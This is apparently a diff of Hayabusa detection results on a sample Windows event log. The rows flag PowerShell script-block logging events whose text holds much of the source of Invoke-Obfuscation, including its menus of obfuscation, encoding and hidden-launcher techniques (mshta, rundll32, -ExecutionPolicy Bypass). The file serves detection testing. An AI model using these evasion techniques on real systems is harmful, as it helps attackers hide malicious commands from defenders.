# Escape double-quote with backslash for powershell.exe. If($PowerShellClip.Contains('""')) { $PowerShellClip = $PowerShellClip.Replace('""','\""') } Return $PowerShellClip }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant <http://www.mandiant.com> # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Invoke-Obfuscation { <# .SYNOPSIS Master function that orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents. Interactive mode enables one to explore all available obfuscation functions and apply them incrementally to input PowerShell script block or script path contents. Invoke-Obfuscation Function: Invoke-Obfuscation Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Show-AsciiArt, Show-HelpMenu, Show-Menu, Show-OptionsMenu, Show-Tutorial and Out-ScriptContents (all located in Invoke-Obfuscation.ps1) Optional Dependencies: None .DESCRIPTION Invoke-Obfuscation orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments and common parent-child process relationships. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER ScriptPath Specifies the path to your payload (can be local file, UNC-path, or remote URI). .PARAMETER Command Specifies the obfuscation commands to run against the input ScriptBlock or ScriptPath parameter. .PARAMETER NoExit (Optional - only works if Command is specified) Outputs the option to not exit after running obfuscation commands defined in Command parameter. .PARAMETER Quiet (Optional - only works if Command is specified) Outputs the option to output only the final obfuscated result via stdout. .EXAMPLE C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -NoExit C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -Quiet C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -NoExit -Quiet .NOTES Invoke-Obfuscation orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'ScriptBlock')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [String] $ScriptPath, [String] $Command, [Switch] $NoExit, [Switch] $Quiet ) # Define variables for CLI functionality. $Script:CliCommands = @() $Script:CompoundCommand = @() $Script:QuietWasSpecified = $FALSE $CliWasSpecified = $FALSE $NoExitWasSpecified = $FALSE # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['ScriptBlock']) { $Script:CliCommands += ('set scriptblock ' + [String]$ScriptBlock) } If($PSBoundParameters['ScriptPath']) { $Script:CliCommands += ('set scriptpath ' + $ScriptPath) } # Append Command to CliCommands if specified by user input. If($PSBoundParameters['Command']) { $Script:CliCommands += $Command.Split(',') $CliWasSpecified = $TRUE If($PSBoundParameters['NoExit']) { $NoExitWasSpecified = $TRUE } If($PSBoundParameters['Quiet']) { # Create empty Write-Host and Start-Sleep proxy functions to cause any Write-Host or Start-Sleep invocations to not do anything until non-interactive -Command values are finished being processed. Function Write-Host {} Function Start-Sleep {} $Script:QuietWasSpecified = $TRUE } } ######################################## ## Script-wide variable instantiation ## ######################################## # Script-level array of Show Options menu, set as SCRIPT-level so it can be set from within any of the functions. # Build out menu for Show Options selection from user in Show-OptionsMenu menu. $Script:ScriptPath = '' $Script:ScriptBlock = '' $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:ObfuscatedCommand = '' $Script:ObfuscatedCommandHistory = @() $Script:ObfuscationLength = '' $Script:OptionsMenu = @() $Script:OptionsMenu += , @('ScriptPath ' , $Script:ScriptPath , $TRUE) $Script:OptionsMenu += , @('ScriptBlock' , $Script:ScriptBlock , $TRUE) $Script:OptionsMenu += , @('CommandLineSyntax' , $Script:CliSyntax , $FALSE) $Script:OptionsMenu += , @('ExecutionCommands' , $Script:ExecutionCommands, $FALSE) $Script:OptionsMenu += , @('ObfuscatedCommand' , $Script:ObfuscatedCommand, $FALSE) $Script:OptionsMenu += , @('ObfuscationLength' , $Script:ObfuscatedCommand, $FALSE) # Build out $SetInputOptions from above items set as $TRUE (as settable). $SettableInputOptions = @() ForEach($Option in $Script:OptionsMenu) { If($Option[2]) {$SettableInputOptions += ([String]$Option[0]).ToLower().Trim()} } # Script-level variable for whether LAUNCHER has been applied to current ObfuscatedToken. $Script:LauncherApplied = $FALSE # Ensure Invoke-Obfuscation module was properly imported before continuing. If(!(Get-Module Invoke-Obfuscation | Where-Object {$_.ModuleType -eq 'Manifest'})) { $PathTopsd1 = ""$ScriptDir\Invoke-Obfuscation.psd1"" If($PathTopsd1.Contains(' ')) {$PathTopsd1 = '""' + $PathTopsd1 + '""'} Write-Host ""`n`nERROR: Invoke-Obfuscation module is not loaded. You must run:"" -ForegroundColor Red Write-Host "" Import-Module $PathTopsd1`n`n"" -ForegroundColor Yellow Exit } # Maximum size for cmd.exe and clipboard. $CmdMaxLength = 8190 # Build interactive menus. $LineSpacing = '[*] ' # Main Menu. $MenuLevel = @() $MenuLevel+= , @($LineSpacing, 'TOKEN' , 'Obfuscate PowerShell command <Tokens>') $MenuLevel+= , @($LineSpacing, 'STRING' , 'Obfuscate entire command as a <String>') $MenuLevel+= , @($LineSpacing, 'ENCODING' , 'Obfuscate entire command via <Encoding>') $MenuLevel+= , @($LineSpacing, 'LAUNCHER' , 'Obfuscate command args w/<Launcher> techniques (run once at end)') # Main\Token Menu. $MenuLevel_Token = @() $MenuLevel_Token += , @($LineSpacing, 'STRING' , 'Obfuscate <String> tokens (suggested to run first)') $MenuLevel_Token += , @($LineSpacing, 'COMMAND' , 'Obfuscate <Command> tokens') $MenuLevel_Token += , @($LineSpacing, 'ARGUMENT' , 'Obfuscate <Argument> tokens') $MenuLevel_Token += , @($LineSpacing, 'MEMBER' , 'Obfuscate <Member> tokens') $MenuLevel_Token += , @($LineSpacing, 'VARIABLE' , 'Obfuscate <Variable> tokens') $MenuLevel_Token += , @($LineSpacing, 'TYPE ' , 'Obfuscate <Type> tokens') $MenuLevel_Token += , @($LineSpacing, 'COMMENT' , 'Remove all <Comment> tokens') $MenuLevel_Token += , @($LineSpacing, 'WHITESPACE' , 'Insert random <Whitespace> (suggested to run last)') $MenuLevel_Token += , @($LineSpacing, 'ALL ' , 'Select <All> choices from above (random order)') $MenuLevel_Token_String = @() $MenuLevel_Token_String += , @($LineSpacing, '1' , ""Concatenate --> e.g. <('co'+'ffe'+'e')>"" , @('Out-ObfuscatedTokenCommand', 'String', 1)) $MenuLevel_Token_String += , @($LineSpacing, '2' , ""Reorder --> e.g. <('{1}{0}'-f'ffee','co')>"" , @('Out-ObfuscatedTokenCommand', 'String', 2)) $MenuLevel_Token_Command = @() $MenuLevel_Token_Command += , @($LineSpacing, '1' , 'Ticks --> e.g. <Ne`w-O`Bject>' , @('Out-ObfuscatedTokenCommand', 'Command', 1)) $MenuLevel_Token_Command += , @($LineSpacing, '2' , ""Splatting + Concatenate --> e.g. <&('Ne'+'w-Ob'+'ject')>"" , @('Out-ObfuscatedTokenCommand', 'Command', 2)) $MenuLevel_Token_Command += , @($LineSpacing, '3' , ""Splatting + Reorder --> e.g. <&('{1}{0}'-f'bject','New-O')>"" , @('Out-ObfuscatedTokenCommand', 'Command', 3)) $MenuLevel_Token_Argument = @() $MenuLevel_Token_Argument += , @($LineSpacing, '1' , 'Random Case --> e.g. <nEt.weBclIenT>' , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 1)) $MenuLevel_Token_Argument += , @($LineSpacing, '2' , 'Ticks --> e.g. <nE`T.we`Bc`lIe`NT>' , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 2)) $MenuLevel_Token_Argument += , @($LineSpacing, '3' , ""Concatenate --> e.g. <('Ne'+'t.We'+'bClient')>"" , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 3)) $MenuLevel_Token_Argument += , @($LineSpacing, '4' , ""Reorder --> e.g. <('{1}{0}'-f'bClient','Net.We')>"" , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 4)) $MenuLevel_Token_Member = @() $MenuLevel_Token_Member += , @($LineSpacing, '1' , 'Random Case --> e.g. <dOwnLoAdsTRing>'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant <http://www.mandiant.com> # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Invoke-Obfuscation { <# .SYNOPSIS Master function that orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents. Interactive mode enables one to explore all available obfuscation functions and apply them incrementally to input PowerShell script block or script path contents. Invoke-Obfuscation Function: Invoke-Obfuscation Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Show-AsciiArt, Show-HelpMenu, Show-Menu, Show-OptionsMenu, Show-Tutorial and Out-ScriptContents (all located in Invoke-Obfuscation.ps1) Optional Dependencies: None .DESCRIPTION Invoke-Obfuscation orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments and common parent-child process relationships. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER ScriptPath Specifies the path to your payload (can be local file, UNC-path, or remote URI). .PARAMETER Command Specifies the obfuscation commands to run against the input ScriptBlock or ScriptPath parameter. .PARAMETER NoExit (Optional - only works if Command is specified) Outputs the option to not exit after running obfuscation commands defined in Command parameter. .PARAMETER Quiet (Optional - only works if Command is specified) Outputs the option to output only the final obfuscated result via stdout. .EXAMPLE C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -NoExit C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -Quiet C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -NoExit -Quiet .NOTES Invoke-Obfuscation orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'ScriptBlock')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [String] $ScriptPath, [String] $Command, [Switch] $NoExit, [Switch] $Quiet ) # Define variables for CLI functionality. $Script:CliCommands = @() $Script:CompoundCommand = @() $Script:QuietWasSpecified = $FALSE $CliWasSpecified = $FALSE $NoExitWasSpecified = $FALSE # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['ScriptBlock']) { $Script:CliCommands += ('set scriptblock ' + [String]$ScriptBlock) } If($PSBoundParameters['ScriptPath']) { $Script:CliCommands += ('set scriptpath ' + $ScriptPath) } # Append Command to CliCommands if specified by user input. If($PSBoundParameters['Command']) { $Script:CliCommands += $Command.Split(',') $CliWasSpecified = $TRUE If($PSBoundParameters['NoExit']) { $NoExitWasSpecified = $TRUE } If($PSBoundParameters['Quiet']) { # Create empty Write-Host and Start-Sleep proxy functions to cause any Write-Host or Start-Sleep invocations to not do anything until non-interactive -Command values are finished being processed. Function Write-Host {} Function Start-Sleep {} $Script:QuietWasSpecified = $TRUE } } ######################################## ## Script-wide variable instantiation ## ######################################## # Script-level array of Show Options menu, set as SCRIPT-level so it can be set from within any of the functions. # Build out menu for Show Options selection from user in Show-OptionsMenu menu. $Script:ScriptPath = '' $Script:ScriptBlock = '' $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:ObfuscatedCommand = '' $Script:ObfuscatedCommandHistory = @() $Script:ObfuscationLength = '' $Script:OptionsMenu = @() $Script:OptionsMenu += , @('ScriptPath ' , $Script:ScriptPath , $TRUE) $Script:OptionsMenu += , @('ScriptBlock' , $Script:ScriptBlock , $TRUE) $Script:OptionsMenu += , @('CommandLineSyntax' , $Script:CliSyntax , $FALSE) $Script:OptionsMenu += , @('ExecutionCommands' , $Script:ExecutionCommands, $FALSE) $Script:OptionsMenu += , @('ObfuscatedCommand' , $Script:ObfuscatedCommand, $FALSE) $Script:OptionsMenu += , @('ObfuscationLength' , $Script:ObfuscatedCommand, $FALSE) # Build out $SetInputOptions from above items set as $TRUE (as settable). $SettableInputOptions = @() ForEach($Option in $Script:OptionsMenu) { If($Option[2]) {$SettableInputOptions += ([String]$Option[0]).ToLower().Trim()} } # Script-level variable for whether LAUNCHER has been applied to current ObfuscatedToken. $Script:LauncherApplied = $FALSE # Ensure Invoke-Obfuscation module was properly imported before continuing. If(!(Get-Module Invoke-Obfuscation | Where-Object {$_.ModuleType -eq 'Manifest'})) { $PathTopsd1 = ""$ScriptDir\Invoke-Obfuscation.psd1"" If($PathTopsd1.Contains(' ')) {$PathTopsd1 = '""' + $PathTopsd1 + '""'} Write-Host ""`n`nERROR: Invoke-Obfuscation module is not loaded. You must run:"" -ForegroundColor Red Write-Host "" Import-Module $PathTopsd1`n`n"" -ForegroundColor Yellow Exit } # Maximum size for cmd.exe and clipboard. $CmdMaxLength = 8190 # Build interactive menus. $LineSpacing = '[*] ' # Main Menu. $MenuLevel = @() $MenuLevel+= , @($LineSpacing, 'TOKEN' , 'Obfuscate PowerShell command <Tokens>') $MenuLevel+= , @($LineSpacing, 'STRING' , 'Obfuscate entire command as a <String>') $MenuLevel+= , @($LineSpacing, 'ENCODING' , 'Obfuscate entire command via <Encoding>') $MenuLevel+= , @($LineSpacing, 'LAUNCHER' , 'Obfuscate command args w/<Launcher> techniques (run once at end)') # Main\Token Menu. $MenuLevel_Token = @() $MenuLevel_Token += , @($LineSpacing, 'STRING' , 'Obfuscate <String> tokens (suggested to run first)') $MenuLevel_Token += , @($LineSpacing, 'COMMAND' , 'Obfuscate <Command> tokens') $MenuLevel_Token += , @($LineSpacing, 'ARGUMENT' , 'Obfuscate <Argument> tokens') $MenuLevel_Token += , @($LineSpacing, 'MEMBER' , 'Obfuscate <Member> tokens') $MenuLevel_Token += , @($LineSpacing, 'VARIABLE' , 'Obfuscate <Variable> tokens') $MenuLevel_Token += , @($LineSpacing, 'TYPE ' , 'Obfuscate <Type> tokens') $MenuLevel_Token += , @($LineSpacing, 'COMMENT' , 'Remove all <Comment> tokens') $MenuLevel_Token += , @($LineSpacing, 'WHITESPACE' , 'Insert random <Whitespace> (suggested to run last)') $MenuLevel_Token += , @($LineSpacing, 'ALL ' , 'Select <All> choices from above (random order)') $MenuLevel_Token_String = @() $MenuLevel_Token_String += , @($LineSpacing, '1' , ""Concatenate --> e.g. <('co'+'ffe'+'e')>"" , @('Out-ObfuscatedTokenCommand', 'String', 1)) $MenuLevel_Token_String += , @($LineSpacing, '2' , ""Reorder --> e.g. <('{1}{0}'-f'ffee','co')>"" , @('Out-ObfuscatedTokenCommand', 'String', 2)) $MenuLevel_Token_Command = @() $MenuLevel_Token_Command += , @($LineSpacing, '1' , 'Ticks --> e.g. <Ne`w-O`Bject>' , @('Out-ObfuscatedTokenCommand', 'Command', 1)) $MenuLevel_Token_Command += , @($LineSpacing, '2' , ""Splatting + Concatenate --> e.g. <&('Ne'+'w-Ob'+'ject')>"" , @('Out-ObfuscatedTokenCommand', 'Command', 2)) $MenuLevel_Token_Command += , @($LineSpacing, '3' , ""Splatting + Reorder --> e.g. <&('{1}{0}'-f'bject','New-O')>"" , @('Out-ObfuscatedTokenCommand', 'Command', 3)) $MenuLevel_Token_Argument = @() $MenuLevel_Token_Argument += , @($LineSpacing, '1' , 'Random Case --> e.g. <nEt.weBclIenT>' , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 1)) $MenuLevel_Token_Argument += , @($LineSpacing, '2' , 'Ticks --> e.g. <nE`T.we`Bc`lIe`NT>' , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 2)) $MenuLevel_Token_Argument += , @($LineSpacing, '3' , ""Concatenate --> e.g. <('Ne'+'t.We'+'bClient')>"" , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 3)) $MenuLevel_Token_Argument += , @($LineSpacing, '4' , ""Reorder --> e.g. <('{1}{0}'-f'bClient','Net.We')>"" , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 4)) $MenuLevel_Token_Member = @() $MenuLevel_Token_Member += , @($LineSpacing, '1' , 'Random Case --> e.g. <dOwnLoAdsTRing>'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,", @('Out-ObfuscatedTokenCommand', 'Member', 1)) $MenuLevel_Token_Member += , @($LineSpacing, '2' , 'Ticks --> e.g. <d`Ow`NLoAd`STRin`g>' , @('Out-ObfuscatedTokenCommand', 'Member', 2)) $MenuLevel_Token_Member += , @($LineSpacing, '3' , ""Concatenate --> e.g. <('dOwnLo'+'AdsT'+'Ring').Invoke()>"" , @('Out-ObfuscatedTokenCommand', 'Member', 3)) $MenuLevel_Token_Member += , @($LineSpacing, '4' , ""Reorder --> e.g. <('{1}{0}'-f'dString','Downloa').Invoke()>"" , @('Out-ObfuscatedTokenCommand', 'Member', 4)) $MenuLevel_Token_Variable = @() $MenuLevel_Token_Variable += , @($LineSpacing, '1' , 'Random Case + {} + Ticks --> e.g. <${c`hEm`eX}>' , @('Out-ObfuscatedTokenCommand', 'Variable', 1)) $MenuLevel_Token_Type = @() $MenuLevel_Token_Type += , @($LineSpacing, '1' , ""Type Cast + Concatenate --> e.g. <[Type]('Con'+'sole')>"" , @('Out-ObfuscatedTokenCommand', 'Type', 1)) $MenuLevel_Token_Type += , @($LineSpacing, '2' , ""Type Cast + Reordered --> e.g. <[Type]('{1}{0}'-f'sole','Con')>"" , @('Out-ObfuscatedTokenCommand', 'Type', 2)) $MenuLevel_Token_Whitespace = @() $MenuLevel_Token_Whitespace += , @($LineSpacing, '1' , ""`tRandom Whitespace --> e.g. <.( 'Ne' +'w-Ob' + 'ject')>"" , @('Out-ObfuscatedTokenCommand', 'RandomWhitespace', 1)) $MenuLevel_Token_Comment = @() $MenuLevel_Token_Comment += , @($LineSpacing, '1' , ""Remove Comments --> e.g. self-explanatory"" , @('Out-ObfuscatedTokenCommand', 'Comment', 1)) $MenuLevel_Token_All = @() $MenuLevel_Token_All += , @($LineSpacing, '1' , ""`tExecute <ALL> Token obfuscation techniques (random order)"" , @('Out-ObfuscatedTokenCommandAll', '', '')) # Main\String Menu. $MenuLevel_String = @() $MenuLevel_String += , @($LineSpacing, '1' , '<Concatenate> entire command' , @('Out-ObfuscatedStringCommand', '', 1)) $MenuLevel_String += , @($LineSpacing, '2' , '<Reorder> entire command after concatenating' , @('Out-ObfuscatedStringCommand', '', 2)) $MenuLevel_String += , @($LineSpacing, '3' , '<Reverse> entire command after concatenating' , @('Out-ObfuscatedStringCommand', '', 3)) # Main\Encoding Menu. $MenuLevel_Encoding = @() $MenuLevel_Encoding += , @($LineSpacing, '1' , ""`tEncode entire command as <ASCII>"" , @('Out-EncodedAsciiCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '2' , ""`tEncode entire command as <Hex>"" , @('Out-EncodedHexCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '3' , ""`tEncode entire command as <Octal>"" , @('Out-EncodedOctalCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '4' , ""`tEncode entire command as <Binary>"" , @('Out-EncodedBinaryCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '5' , ""`tEncrypt entire command as <SecureString> (AES)"" , @('Out-SecureStringCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '6' , ""`tEncode entire command as <BXOR>"" , @('Out-EncodedBXORCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '7' , ""`tEncode entire command as <Special Characters>"" , @('Out-EncodedSpecialCharOnlyCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '8' , ""`tEncode entire command as <Whitespace>"" , @('Out-EncodedWhitespaceCommand' , '', '')) # Main\Launcher Menu. $MenuLevel_Launcher = @() $MenuLevel_Launcher += , @($LineSpacing, 'PS' , ""`t<PowerShell>"") $MenuLevel_Launcher += , @($LineSpacing, 'CMD' , '<Cmd> + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'WMIC' , '<Wmic> + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'RUNDLL' , '<Rundll32> + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'VAR+' , 'Cmd + set <Var> && PowerShell iex <Var>') $MenuLevel_Launcher += , @($LineSpacing, 'STDIN+' , 'Cmd + <Echo> | PowerShell - (stdin)') $MenuLevel_Launcher += , @($LineSpacing, 'CLIP+' , 'Cmd + <Echo> | Clip && PowerShell iex <clipboard>') $MenuLevel_Launcher += , @($LineSpacing, 'VAR++' , 'Cmd + set <Var> && Cmd && PowerShell iex <Var>') $MenuLevel_Launcher += , @($LineSpacing, 'STDIN++' , 'Cmd + set <Var> && Cmd <Echo> | PowerShell - (stdin)') $MenuLevel_Launcher += , @($LineSpacing, 'CLIP++' , 'Cmd + <Echo> | Clip && Cmd && PowerShell iex <clipboard>') $MenuLevel_Launcher += , @($LineSpacing, 'RUNDLL++' , 'Cmd + set Var && <Rundll32> && PowerShell iex Var') $MenuLevel_Launcher += , @($LineSpacing, 'MSHTA++' , 'Cmd + set Var && <Mshta> && PowerShell iex Var') $MenuLevel_Launcher_PS = @() $MenuLevel_Launcher_PS += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_PS += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_CMD = @() $MenuLevel_Launcher_CMD += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_WMIC = @() $MenuLevel_Launcher_WMIC += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_RUNDLL = @() 